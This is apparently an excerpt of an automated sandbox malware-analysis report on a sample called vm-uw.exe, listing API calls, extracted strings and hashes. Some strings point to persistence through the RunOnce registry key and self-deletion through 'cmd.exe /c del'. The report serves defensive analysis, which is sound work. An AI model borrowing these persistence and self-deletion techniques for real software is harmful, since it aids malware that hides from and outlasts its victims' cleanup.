                          • API ID: Window$ItemMetricsSystem$FileMessageModuleNameRectSendText_wcslen
                          • String ID:
                          • API String ID: 880410036-0
                          • Opcode ID: cd381f3f44f39e168e900ff935eb8aa3033633a6f1b9e49b22e64ae31990daf8
                          • Instruction ID: 1615e3124029fe8ab59e6e9a635d1ea9739a25524e3a894fd26c9e84e8a80487
                          • Opcode Fuzzy Hash: cd381f3f44f39e168e900ff935eb8aa3033633a6f1b9e49b22e64ae31990daf8
                          • Instruction Fuzzy Hash: C6215971218341ABD320EB60DC9EB9FB7E8EF58304F404929B989961A1EB70E544CB92
                          APIs
                          • _free.LIBCMT ref: 002260E9
                            • Part of subcall function 00223185: RtlFreeHeap.NTDLL(00000000,00000000,?,00226168,?,00000000,?,00000000,?,0022618F,?,00000007,?,?,002265D1,?), ref: 0022319B
                            • Part of subcall function 00223185: GetLastError.KERNEL32(?,?,00226168,?,00000000,?,00000000,?,0022618F,?,00000007,?,?,002265D1,?,?), ref: 002231AD
                          • _free.LIBCMT ref: 002260FB
                          • _free.LIBCMT ref: 0022610D
                          • _free.LIBCMT ref: 0022611F
                          • _free.LIBCMT ref: 00226131
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: f71759b23a5c4b09046d14795ffb3c1bc94c535cf8ede21b991fc19356a644e6
                          • Instruction ID: fdf1e26dd1e3191bca16a8f6f88f39961a5e9ce0d2d98795a255a308be26a86c
                          • Opcode Fuzzy Hash: f71759b23a5c4b09046d14795ffb3c1bc94c535cf8ede21b991fc19356a644e6
                          • Instruction Fuzzy Hash: A8F0627352022077CA20DFD4F8CEC16B7EAEA813107940809F00CD7602CB38FDB28A68
                          APIs
                            • Part of subcall function 001F81F0: EnterCriticalSection.KERNEL32(00000000,1FE05385), ref: 001F8243
                            • Part of subcall function 001F81F0: LeaveCriticalSection.KERNEL32(00000000,1FE05385), ref: 001F83AD
                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,1FE05385,00000000,?,00000000), ref: 001EE33A
                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,1FE05385), ref: 001EE378
                          • GetLastError.KERNEL32(?,?,1FE05385,00000000,?,00000000), ref: 001EE3D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CreateCriticalDirectorySection$EnterErrorLastLeave
                          • String ID: %sD.%.03d.%.03d
                          • API String ID: 3373519864-1691038501
                          • Opcode ID: 40220a2292b2410f22e55a04e687eb29cd41bd80481a8b0973f61ed08e4992be
                          • Instruction ID: a6aa34468f1658304ac992e7f41ebaf0a5fe65880fc1ed36167e50da4f93d3c4
                          • Opcode Fuzzy Hash: 40220a2292b2410f22e55a04e687eb29cd41bd80481a8b0973f61ed08e4992be
                          • Instruction Fuzzy Hash: 54C1D170E11688DFDF14CFA8E989BADB7F5AF55304F208228E005EB291D735AA45CF51
                          APIs
                          Strings
                          • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 001E69EE
                          • delete, xrefs: 001E6949
                          • cmd.exe /c del ", xrefs: 001E6999
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$cmd.exe /c del "$delete
                          • API String ID: 176396367-2646081076
                          • Opcode ID: 1e49cf11d3114919be2282831df4d64d0caecdbdd80bbd56be3c01707205b43c
                          • Instruction ID: d599403aebe1f201b343154068121219d7a8f82ae659a4ef1bf490ad141da5b9
                          • Opcode Fuzzy Hash: 1e49cf11d3114919be2282831df4d64d0caecdbdd80bbd56be3c01707205b43c
                          • Instruction Fuzzy Hash: 4C417F71D006889BCB04FBA2DDA2EEEB379AF74340F504069E41667192EF706E0ACB51
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\vm-uw.exe,00000104), ref: 0022196E
                          • _free.LIBCMT ref: 00221A39
                          • _free.LIBCMT ref: 00221A43
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Users\user\Desktop\vm-uw.exe
                          • API String ID: 2506810119-3953632779
                          • Opcode ID: 65ee9895ec0e6789cd28a9c11c2e5ca152351c605ac73ad392665741ee4f070a
                          • Instruction ID: bdbf81b9aa67a946d03ecdd0a043775936a21218feabe4e2ac1a9b0cfa78cfa5
                          • Opcode Fuzzy Hash: 65ee9895ec0e6789cd28a9c11c2e5ca152351c605ac73ad392665741ee4f070a
                          • Instruction Fuzzy Hash: 4D317071A11269FFDB21DFD9EC85DAFBBFCEB96310B104166E80497211D6708EA1CB50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _free
                          • String ID: @a$$a$
                          • API String ID: 269201875-3789762709
                          • Opcode ID: 54bd1e610bcfb6792f4eda4e29641ef246eaaf4c61ebb8899fe791c8abbc530e
                          • Instruction ID: 9b7e1ff603933092d698aeadae148818434e8eead4ebe0f9da9e91ec9b086852
                          • Opcode Fuzzy Hash: 54bd1e610bcfb6792f4eda4e29641ef246eaaf4c61ebb8899fe791c8abbc530e
                          • Instruction Fuzzy Hash: 20113B31E202227BD725DFB8BD49F5332A4E711730F540225F625CB1E4E774C9E28A80
                          APIs
                          • CloseHandle.KERNEL32(00000000,00000000,?,00220934,00000000), ref: 0022087A
                          • FreeLibrary.KERNEL32(00000000,00000000,?,00220934,00000000), ref: 00220889
                          • _free.LIBCMT ref: 00220890
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CloseFreeHandleLibrary_free
                          • String ID: 4"
                          • API String ID: 621396759-3632361203
                          • Opcode ID: 5ef2b0d2dc5b978d5d6e91e9cf04b68ba6a975b71ea9ed9f826362f6ab74a606
                          • Instruction ID: afddb79d83043f0e5416f205a387b65bd005320637e6fb7cfeac043e5416e46c
                          • Opcode Fuzzy Hash: 5ef2b0d2dc5b978d5d6e91e9cf04b68ba6a975b71ea9ed9f826362f6ab74a606
                          • Instruction Fuzzy Hash: 54E08632411625BBC7356F85F88CB57B7A9EF40321F448129E45911461C735ACA1CFD9
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetLargePageMinimum,00204073,?,00213E22,?,00213DBC,?,002028D0), ref: 002040A1
                          • GetProcAddress.KERNEL32(00000000), ref: 002040A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetLargePageMinimum$kernel32.dll
                          • API String ID: 1646373207-2515562745
                          • Opcode ID: aa136c826940dfd415b9fd2444b767efcccda36613e1fcb1c94ce3339503b306
                          • Instruction ID: b908d09eb287733aac0776620203ed1bad0793cbb365f6af1e8a4c31ee3c98df
                          • Opcode Fuzzy Hash: aa136c826940dfd415b9fd2444b767efcccda36613e1fcb1c94ce3339503b306
                          • Instruction Fuzzy Hash: 18E04FB4B617068AC748FF35BC5D72E31657F5AF01B905214E204E2090EB20E518C620
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: __alldvrm$_strrchr
                          • String ID:
                          • API String ID: 1036877536-0
                          • Opcode ID: d5d8c2f5b98ed250904a6ea1cf052e06909f25cf330743b3d15b29539ca88f18
                          • Instruction ID: 2eb15cdc15ac0400c3b887549e4b50a1e7acd6a24dec2b9136afa817d8c3d21f
                          • Opcode Fuzzy Hash: d5d8c2f5b98ed250904a6ea1cf052e06909f25cf330743b3d15b29539ca88f18
                          • Instruction Fuzzy Hash: A4A158729203A6BFEB11CF98E8817BEBBE5EF15310F14416DE5459B341C27C8A61CB91
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,?,00000000,?,?,?,?,001E2807,0022F168,000000FF), ref: 001F8900
                          • GetFullPathNameW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,001E2807,0022F168,000000FF), ref: 001F896B
                          • _wcslen.LIBCMT ref: 001F89A3
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,001E2807,0022F168,000000FF), ref: 001F8AE4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: FullNamePath$_wcslenlstrlen
                          • String ID:
                          • API String ID: 2239826801-0
                          • Opcode ID: a6c0a1304bb349bfc04656d103618419b01b05ac221e763104cf7ae65f6e0da6
                          • Instruction ID: a21147eb1d5085a7dab70e50a6e7b191cb42fa5d54e125a2d3c71a1d2b9c9721
                          • Opcode Fuzzy Hash: a6c0a1304bb349bfc04656d103618419b01b05ac221e763104cf7ae65f6e0da6
                          • Instruction Fuzzy Hash: 5891C2B1910209DFCB18DF64C895AFE77B5FF89310F20462AE516DB290EB30DA51CB61
                          APIs
                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,1FE05385), ref: 001EDA2F
                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,40000000,00000003,00000000,00000003,02000000,00000000,1FE05385), ref: 001EDA91
                          • SetFileTime.KERNEL32(00000000,?,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000,1FE05385), ref: 001EDB11
                          • CloseHandle.KERNEL32(00000000,?,40000000,00000003,00000000,00000003,02000000,00000000,1FE05385), ref: 001EDB1D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: File$Create$CloseHandleTime
                          • String ID:
                          • API String ID: 2287278272-0
                          • Opcode ID: 742c806cfff397e81a5b0db2e077b15a594ee7b63294a0a07d82ebcc4f265512
                          • Instruction ID: 8a2c269348e87581e2f4975a743f2e0ef94ab13020e70fb5b98437aca7438625
                          • Opcode Fuzzy Hash: 742c806cfff397e81a5b0db2e077b15a594ee7b63294a0a07d82ebcc4f265512
                          • Instruction Fuzzy Hash: 3F51E570A00289AFEF24CF69EC95BEEBBB5AF45714F14422DE811E72C0E7359A45CB50
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,D0E85006,0021F879,00000000,00000000,002200A7,?,002200A7,?,00000001,0021F879,D0E85006,00000001,002200A7,002200A7), ref: 002262EC
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00226375
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00226387
                          • __freea.LIBCMT ref: 00226390
                            • Part of subcall function 002231BF: RtlAllocateHeap.NTDLL(00000000,?,?,?,0021B1C1,?,?,001E1D09,00000018,1FE05385,?,0022E43A,000000FF), ref: 002231F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          • API String ID: 2652629310-0
                          • Opcode ID: 9992d1c9f4a66d050d05c81712e544d83b70c9947c3603cf3157ff5768d48d33
                          • Instruction ID: 56b32b92b62fc89345aa09d999d8fedacbf7f014352e0f43b2246e106ade824a
                          • Opcode Fuzzy Hash: 9992d1c9f4a66d050d05c81712e544d83b70c9947c3603cf3157ff5768d48d33
                          • Instruction Fuzzy Hash: C731C072A2022AABDF25DFA4EC49DEE7BA5EB41710F144169FC04D7250E735CD60CBA0
                          APIs
                          • GetSystemMetrics.USER32(00000000), ref: 001E548F
                          • GetSystemMetrics.USER32(00000001), ref: 001E5495
                          • GetWindowRect.USER32(?,?), ref: 001E54A1
                          • SetWindowPos.USER32(?,000000FE,?,?,00000001,?,?,?,?,?,?,?,001E4F63,00000001), ref: 001E54E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: MetricsSystemWindow$Rect
                          • String ID:
                          • API String ID: 3945642117-0
                          • Opcode ID: fe32e91b69aaa1d2b637ff7952becf156c1a30edb15e298148cbcaeddfc2dc8a
                          • Instruction ID: 4fa0a5c1d0f5e4edb482e2f948fe2430c87347118afd9961dbd7822ee91cc292
                          • Opcode Fuzzy Hash: fe32e91b69aaa1d2b637ff7952becf156c1a30edb15e298148cbcaeddfc2dc8a
                          • Instruction Fuzzy Hash: D01173B1A10119ABCB04DFB8DD599AFBBB9EB44314F154269E902E7190DB71A900CBA0
                          APIs
                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0021DC45
                            • Part of subcall function 0021DB92: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0021DBC1
                            • Part of subcall function 0021DB92: ___AdjustPointer.LIBCMT ref: 0021DBDC
                          • _UnwindNestedFrames.LIBCMT ref: 0021DC5A
                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0021DC6B
                          • CallCatchBlock.LIBVCRUNTIME ref: 0021DC93
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                          • String ID:
                          • API String ID: 737400349-0
                          • Opcode ID: 37c095809e1bf7e48bf3418cc1414d78755f3cccd12a3e339f2955e8fd36c6fb
                          • Instruction ID: f1a962b1ed60913fb44db109b9c135c33d31e26c395be3121d2303390efba72e
                          • Opcode Fuzzy Hash: 37c095809e1bf7e48bf3418cc1414d78755f3cccd12a3e339f2955e8fd36c6fb
                          • Instruction Fuzzy Hash: B2014C72110149BBCF126E95CD41EEB3BAAEFA8754F054415FE1856121D332E8B1DFA0
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,002242DC,?,00000000,00000000,00000000,?,002244D9,00000006,FlsSetValue), ref: 00224367
                          • GetLastError.KERNEL32(?,002242DC,?,00000000,00000000,00000000,?,002244D9,00000006,FlsSetValue,00231C68,FlsSetValue,00000000,00000364,?,00222FAC), ref: 00224373
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002242DC,?,00000000,00000000,00000000,?,002244D9,00000006,FlsSetValue,00231C68,FlsSetValue,00000000), ref: 00224381
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: 07e00d01a2e046803cb89ad6ca4af64fe58e678db393b11dcab038da78d83318
                          • Instruction ID: 8a683b32fdd10dd22752cf7c2053d9ee1e3ee35e8df47defa81af031912976eb
                          • Opcode Fuzzy Hash: 07e00d01a2e046803cb89ad6ca4af64fe58e678db393b11dcab038da78d83318
                          • Instruction Fuzzy Hash: C6018436666237BBC721EEA9FC98A567758AF45BA1B340660F906D7140D720D821CAF0
                          APIs
                          • GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000207,?,?,00000000), ref: 001F2AB9
                          • _wcslen.LIBCMT ref: 001F2AC6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: EnvironmentVariable_wcslen
                          • String ID: APPDATA
                          • API String ID: 4168748220-4054820676
                          • Opcode ID: 87525d39e4a3e0f01884d1a98b45efe508fa51db7f4c8bfafe14cb1dd98205a0
                          • Instruction ID: db62cd2b1fb5c8adeebbb506904c53f6c0dbadecfcf54cd88744002977d11fea
                          • Opcode Fuzzy Hash: 87525d39e4a3e0f01884d1a98b45efe508fa51db7f4c8bfafe14cb1dd98205a0
                          • Instruction Fuzzy Hash: 9A61C6B19102199BCB28DF24DC917BEB3B4FF55310F6002ADEA1AD7290D7309E84CB95
                          APIs
